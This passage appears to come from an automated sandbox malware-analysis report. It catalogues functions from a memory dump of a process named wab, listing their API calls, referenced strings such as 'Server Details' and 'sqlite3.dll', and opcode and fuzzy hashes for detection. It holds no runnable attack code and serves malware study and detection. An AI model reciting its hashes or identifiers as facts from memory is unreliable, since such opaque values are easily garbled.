                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                              Strings
                                                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                              • String ID: recovered %d pages from %s
                                                                                              • API String ID: 985450955-1623757624
                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _ultoasprintf
                                                                                              • String ID: %s %s %s
                                                                                              • API String ID: 432394123-3850900253
                                                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409919
                                                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: N\@
                                                                                              • API String ID: 568519121-3851889168
                                                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                              • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                              • String ID: menu_%d
                                                                                              • API String ID: 1129539653-2417748251
                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _msizerealloc
                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                              • API String ID: 2713192863-2134078882
                                                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                              • strrchr.MSVCRT ref: 00409808
                                                                                              • _mbscat.MSVCRT ref: 0040981D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName_mbscatstrrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 3334749609-1948609170
                                                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                              • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT ref: 004070EB
                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                              • String ID: sqlite3.dll
                                                                                              • API String ID: 1983510840-1155512374
                                                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID: A4@$Server Details
                                                                                              • API String ID: 1096422788-4071850762
                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                              • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3110682361-0
                                                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3510742995-0
                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%